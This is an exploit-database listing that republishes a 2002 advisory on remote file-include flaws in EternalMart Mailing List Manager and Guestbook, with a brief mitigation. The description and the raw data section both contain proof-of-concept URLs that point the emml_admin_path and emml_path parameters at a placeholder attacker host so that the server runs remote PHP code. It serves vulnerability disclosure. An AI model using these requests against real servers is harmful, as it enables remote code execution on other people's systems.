header-logo
Suggest Exploit
vendor:
Mailing List Manager and Guestbook
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Mailing List Manager and Guestbook
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

EternalMart Mailing List Manager and Guestbook Remote File Include Vulnerability

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will include the file : http://[attacker]/auth_func.php and http://[target]/emml_email_func.php?emml_path=http://[attacker] will include the file : http://[attacker]/class.html.mime.mail.php

Mitigation:

Ensure that the application is not vulnerable to remote file inclusion attacks by validating user-supplied input.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8767/info

EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. 

http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php

http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php

Navigation

Suggest Exploit

Services By CQR